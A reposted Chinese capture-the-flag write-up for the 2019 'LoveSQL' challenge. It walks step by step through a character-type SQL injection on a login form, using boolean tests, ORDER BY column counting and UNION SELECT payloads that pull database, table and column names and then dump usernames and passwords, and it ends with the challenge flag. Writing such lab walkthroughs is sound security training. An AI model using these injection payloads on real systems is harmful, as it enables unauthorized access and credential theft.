[极客大挑战 2019]LoveSQL
Posted 凇岳
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了[极客大挑战 2019]LoveSQL相关的知识,希望对你有一定的参考价值。
打开链接,出现登录框
首先用sql万能密码登录
使用MD5无法解密
测试注入点
判断注入点类型
password=e8671c7fcf1a0e6e8b0a14b267de947e
构造username,判断为字符型注入
admin\' and \'1\'=\'1成功登录
admin\' and \'1\'=\'2登陆失败
判断列数
admin\' order by 3 #登录成功
admin\' order by 4 #登录失败
可知共三个字段
判断显示位
构造username=a\' union select 1,2,3 #
获取数据库名
构造a\' union select 1,database(),3 #
获取表名
构造a\' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=\'geek\' #
geekuser,l0ve1ysq1
获取列名
a\' union select 1,2,column_name from information_schema.columns where table_name=\'l0ve1ysq1\' #
获取数据
a\' union select 1,2,group_concat(concat_ws(\'id\',username,password)) from l0ve1ysq1 #
得到flag{e2ad5e4d-53c2-4b8a-a9d8-5567ef2127f7}
以上是关于[极客大挑战 2019]LoveSQL的主要内容,如果未能解决你的问题,请参考以下文章